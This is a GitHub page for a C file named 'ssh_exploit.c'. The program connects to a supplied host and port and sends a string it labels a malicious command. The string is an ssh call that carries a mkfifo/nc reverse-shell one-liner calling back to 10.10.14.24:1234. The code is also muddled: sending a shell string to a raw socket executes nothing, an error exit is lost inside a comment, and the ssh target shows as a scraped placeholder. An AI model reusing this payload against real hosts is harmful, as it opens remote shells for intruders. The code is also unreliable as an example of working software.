-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathssh_exploit.c
46 lines (45 loc) · 2.43 KB
/
ssh_exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
int main(int argc, char * argv[]) {
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent * server;
char buffer[256];
if (argc < 3) { // Check for correct number of arguments
fprintf(stderr, "usage %s hostname port\n", argv[0]); // Error message if incorrect number of arguments
exit(0); // Exit program
}
portno = atoi(argv[2]); // Get port number from command line argument
sockfd = socket(AF_INET, SOCK_STREAM, 0); // Create a new socket
if (sockfd < 0) { // Check for errors in creating the socket
perror("ERROR opening socket"); // Print error message to stderr
exit(1); // Exit program with error code 1
}
server = gethostbyname(argv[1]); // Get the IP address of the server from the command line argument
if (server == NULL) { // Check for errors in getting the IP address of the server
fprintf(stderr, "ERROR, no such host\n"); // Print error message to stderr
exit(0); // Exit program with error code 0
}
bzero((char * ) & serv_addr, sizeof(serv_addr)); // Clear serv_addr structure
serv_addr.sin_family = AF_INET; // Set family type to AF_INET (IPv4)
bcopy((char * ) server -> h_addr, (char * ) & serv_addr.sin_addr.s_addr, server -> h_length); // Copy IP address into serv_addr structure
serv_addr.sin_port = htons(portno); // Convert port number to network byte order and copy into serv addr structure
if (connect(sockfd, (struct sockaddr * ) & serv_addr, sizeof(serv_addr)) < 0) { // Connect to server using socket file descriptor and serv addr structure
perror("ERROR connecting"); // Print error message to stderr
exit(1); // Exit program with error code 1
}
bzero(buffer, 256); // Clear buffer array
strcpy(buffer, "ssh -i /root/.ssh/idrsa [email protected] 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 1234 >/tmp/f'"); // Copy malicious command into buffer array
n = write(sockfd, buffer, strlen(buffer)); // Write malicious command to server using socket file descriptor
if (n < 0) { // Check for errors in writing malicious command to server
perror("ERROR writing to socket"); // Print error message to stderr exit(1);// Exit program with error code 1
}
close(sockfd); // Close connection with server
return 0;
}